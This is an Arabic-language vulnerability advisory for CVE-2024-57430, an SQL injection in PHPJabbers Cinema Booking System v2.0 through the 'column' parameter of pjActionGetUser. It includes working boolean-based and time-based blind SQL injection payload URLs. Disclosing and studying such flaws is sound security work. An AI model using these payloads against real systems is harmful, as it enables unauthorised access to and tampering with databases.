
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 عرضة لثغرة SQL injection، مما يؤدي إلى الوصول غير المصرح به للبيانات وتصعيد الامتيازات.
ثغرة حقن SQL في دالة pjActionGetUser في نظام حجز السينما PHPJabbers الإصدار v2.0 تسمح للمهاجمين بالتلاعب باستعلامات قاعدة البيانات عبر معامل العمود. استغلال هذه الثغرة يمكن أن يؤدي إلى كشف غير مصرح به للمعلومات، أو تصعيد الامتيازات، أو التلاعب بقاعدة البيانات.
المعامل القابل للثغرة: column
يمكن أن يؤدي حقن SQL إلى الوصول غير المصرح به إلى المعلومات الحساسة، وتعديل قاعدة البيانات، وحتى الاختراق الكامل لخادم قاعدة البيانات. يشكل هذا تهديدًا خطيرًا لسرية وسلامة وتوفر التطبيق.
طلب GET على المسار: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10